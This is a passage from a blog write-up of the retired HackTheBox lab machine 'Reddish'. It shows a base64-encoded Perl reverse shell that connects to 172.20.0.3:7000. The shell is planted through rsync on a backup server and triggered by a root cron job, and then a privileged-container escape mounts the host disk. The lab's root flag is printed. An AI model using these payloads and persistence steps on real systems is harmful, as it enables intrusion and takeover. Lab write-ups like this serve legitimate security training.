# echo cGVybCAtZSAndXNlIFNvY2tldDskaT0iMTcyLjIwLjAuMyI7JHA9NzAwMDtzb2NrZXQoUyxQRl9JTkVULFNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCJ0Y3AiKSk7aWYoY29ubmVjdChTLHNvY2thZGRyX2luKCRwLGluZXRfYXRvbigkaSkpKSl7b3BlbihTVERJTiwiPiZTIik7b3BlbihTVERPVVQsIj4mUyIpO29wZW4oU1RERVJSLCI+JlMiKTtleGVjKCIvYmluL3NoIC1pIik7fTsnCg== | base64 -d > shell.sh
  • Transfer the shell file to the backup server from the (172.20.0.3) web server:
# rsync -a shell.sh rsync://backup:873/src/tmp/
# rsync rsync://backup:873/src/tmp/
drwxrwxrwt          4,096 2023/10/19 17:11:09 .
-rw-r--r--            220 2023/10/18 23:52:15 reverse.sh
-rw-r--r--            220 2023/10/19 17:09:39 shell.sh
  • Create the cron job into the web server (172.20.0.3):
# echo '* * * * * root sh /tmp/shell.sh' > shell
  • Transfer the cron job to the backup server:
# rsync -a shell rsync://backup:873/src/etc/cron.d/

Once the cron job is executed we will receive our reverse shell:

Untitled

Once we have access to the container to reach the root flag we need mount one partition because we have completely access to the file system because the container is running with “—privileged” that provide us access tot the raw devices in /dev on the host. We can have more information here.

Now we need to mount one partition to have access to the root flag:

# mount /dev/sda2 /mnt
# ls /mnt/root/
root.txt
# cat /mnt/root/root.txt  
77cac369952e28c6b474a37ec17da8b1
Untitled


After one week struggling with an insane machine from ⚔️ hashtag#HackTheBox 👽 I got it!!! hashtag#Reddish has been a challenge to me because it was my first insane machine 💥.

I did this retired machine 🖥️ because I was looking for improving my pivoting 🦘skills and use the OSCP style ☠️ to do it. It’s why I did this machine ⭐.

🛸 ¡¡¡Happy Hacking!!! 🛸

Deja un comentario

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.